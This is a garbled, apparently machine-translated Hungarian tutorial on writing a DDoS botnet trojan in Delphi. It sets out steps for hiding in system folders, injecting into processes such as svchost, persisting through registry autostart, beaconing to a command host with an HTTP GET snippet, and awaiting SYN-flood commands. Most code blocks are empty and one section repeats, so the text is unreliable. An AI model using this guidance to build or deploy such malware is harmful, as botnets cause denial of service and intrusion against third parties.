Hajó a delphi

Hajó a Delphi

Valamilyen oknál fogva, sok kezdő programozók úgy gondolja, hogy a számítógépes vírusok írt assembly nyelven és ritka kivételek a C ++. Biztosíthatom Önöket, hogy a rosszindulatú lehet írni bármilyen programozási nyelv!
És így. Ma fogunk összpontosítani Delphi - véleményem szerint a legkényelmesebb nyelv, mert ez a legkényelmesebb, hogy megértsék a szintaxis egy ember, persze még mindig megadja a prevalencia és az a tény, hogy a kiindulási tanítani az iskolában. Közötti viták Delphi-programozókat és programozók C ++ látható szinte minden oldalon. Általában az érveket a C ++ és súlyának a processzor terhelését, Delphi esetében - ez nem egy használható kódot. Általában ezek a viták végén az érkezését a rendszergazda és sír. Ma megpróbálom tisztázni, amennyire csak lehetséges, hogy ismertesse, hogyan lehetséges, hogy írjon egy bot hálózat lehetővé teszi, folytassa az írást DDoS botnet Delphi.


Mi az első dolog, amit meg kell csinálni? - Készítsen algoritmust Trojan:
1. elrejti a rendszer
2. álcázott rendszer folyamat
3. A regisztrációhoz a autostart
4. megérintette a fogadó
5. Várja meg a parancsot a „host”
Itt az első lépés már eltelt - egy egyszerű algoritmus bot hálózat készen áll!


Nézzük foglalkozik minden a sorban.
1. Mit jelent „hogy elrejtse a rendszerben?”, Akkor rendezni a memóriában, ahol antivirusniki és az orr ne dugjon, akkor létrehozhat egy boot szektor, és elindítja az első operációs rendszer, de nehéz nem Delphi, hanem az ASM, annál inkább Meg kell rutkitnogo trójai viselkedését, nem bootkit. Mi, mint már mondtam, írunk a legegyszerűbb három- és elég lesz csak valami másolja a rendszer mappába.
kód:

Is, akkor jöhet:
a fájl elérési útját:
kód:

Ez a függvény az utat a rendszer a programot.
kód:

Ez visszaadja a nevét a programban.
kód:

Ez a funkció egyszerűen nem cserélhető! Ez adja vissza a lemezt, amely a program fut, nagyon hasznos reprodukció „a botot.”
És így. Ezután mindannyian úgy döntött. Azt viszont, hogy a cap-nevedimku.


2. Az álcázás rendszer folyamat - azt jelenti, hogy a program pontosan rutkitnogo viselkedését. Gyakran elcsépelt folyamatok - az svchost és felfedező, és a többi, mint akinek nincs. Megteszünk egy kicsit a héber és prikonnektimsya bármely más eljárással. Példák Injektálás:
példa Egy
Példa hozzáadni a kódot (Beep funkció) az exe fájlokat
növelése nélkül méretük.


1. Mi található a kód részben.
2. Check (szabad vége szakasz 86 bájt).
3. Ha a szabadon fűz kódot.
4. Állítsa a belépési pont a kódot.
kód:

Légy óvatos! Mivel ez csak egy tankönyv - adok a kódot oznokomleniya, nem illegális tevékenységekre.


3.Idom tovább, most kell regisztrálni az induláskor, ezt tudjuk a különböző módon, úgy döntöttem, hogy hozzá a rendszerleíró adatbázisban, az érthetőség kedvéért:
kód:

Application.Exename ahol egy parancsot, amely visszaadja a nevét a programban.


4. megkocogtatta a gazda nem olyan nehéz, mint amilyennek tűnik, valamilyen oknál fogva, sokan azt hiszik, hogy otstuk - egy összetéveszthető a kódot, az elkerülő és egyebek - Van a fenevadat, hogy lehet egy egyszerű GET kérés
kód:

5. Végül a várakozás parancsot a gazda. Ezen a ponton támaszkodik a képzelet a végrehajtandó parancsot nevében a rendszergazda (egy rootkit működik az admin folyamat?).
Itt tudok dobni egy kódot támadás szin-árvíz:
kód:

4. megkocogtatta a gazda nem olyan nehéz, mint amilyennek tűnik, valamilyen oknál fogva, sokan azt hiszik, hogy otstuk - egy összetéveszthető a kódot, az elkerülő és egyebek - Van a fenevadat, hogy lehet egy egyszerű GET kérés
kód:
TRT: string;
TRT: = 'hi_admin'
TRT: = StringReplace (TRT, '', '+',
[RfReplaceAll, rfIgnoreCase]);
OTK: = Form2.IdHttp1.Get (Imya_nashego_hos .a.ru .. \ blablabla + 'TRT'.);

5. Végül a várakozás parancsot a gazda.

Tehát nem. Minden ilyen Aver kiég. + Domain gyorsan megy Blackjack. És igen, sőt otstuk egyik legfontosabb tevékenység.

Kapcsolódó cikkek